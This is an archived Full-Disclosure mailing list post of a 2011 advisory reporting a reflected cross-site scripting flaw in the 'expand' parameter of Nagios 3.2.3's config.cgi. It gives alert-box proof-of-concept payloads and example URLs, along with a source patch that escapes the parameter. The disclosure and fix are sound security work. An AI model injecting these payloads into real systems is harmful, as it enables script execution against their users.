full-disclosure - Cross-Site Scripting vulnerability in Nagios

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives

Hash Suite for Android: free password hash cracker in your pocket

[<prev] [next>] [day] [month] [year] [list]

Message-ID: <4DE676ED.9030601@t-online.de>
Date: Wed, 01 Jun 2011 19:29:17 +0200
From: "sschurtz@...nline.de" <sschurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Cross-Site Scripting vulnerability in Nagios

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory:           Cross-Site Scripting vulnerability in Nagios
Advisory ID:        SSCHADV2011-006
Author:             Stefan Schurtz
Affected Software:  Successfully tested on: nagios 3.2.3
Vendor URL:         http://www.nagios.org
Vendor Status:      informed
CVE-ID:             -

==========================
Vulnerability Description:
==========================

This is a Cross-Site Scripting vulnerability

==================
Technical Details:
==================

No input validation for "expand" in config.c(gi)

View Config -> Command Expansion -> To expand ->
<script>alert(String.fromCharCode(88,83,83))</script>
View Config -> Command Expansion -> To expand -> <body onload=alert(666)>

or

http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<body
onload=alert(666)>

=========
Solution:
=========

in config.c

< printf("<TR CLASS='dataEven'><TD CLASS='dataEven'>To expand:</TD><TD
CLASS='dataEven'>%s",command_args[0]);

> printf("<TR CLASS='dataEven'><TD CLASS='dataEven'>To expand:</TD><TD
CLASS='dataEven'>%s",escape_string(command_args[0]));

====================
Disclosure Timeline:
====================

01-Jun-2011 - informed developers
01-Jun-2011 - Release date of this security advisory
01-Jun-2011 - post on BugTraq and Full-disclosure

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.nagios.org
http://tracker.nagios.org/view.php?id=224
http://www.rul3z.de/advisories/SSCHADV2011-006.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk3mdu0ACgkQg3svV2LcbMCBewCfcPxz84vjd9dHl1SULwzDLY1u
r9kAn0+6xP7trDdG0ixjjwLOVELIVAQG
=zLof
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/